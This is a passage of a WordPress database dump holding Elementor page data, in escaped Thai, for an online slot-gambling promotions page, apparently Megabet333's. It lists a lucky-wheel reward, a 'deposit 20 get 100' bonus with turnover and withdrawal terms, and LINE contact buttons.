\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1332,164,'_thumbnail_id','53'),(1339,165,'_elementor_edit_mode','builder'),(1340,165,'_elementor_template_type','wp-page'),(1341,165,'_elementor_version','3.32.5'),(1342,165,'_elementor_pro_version','3.32.3'),(1343,165,'_wp_page_template','default'),(1344,165,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1345,165,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 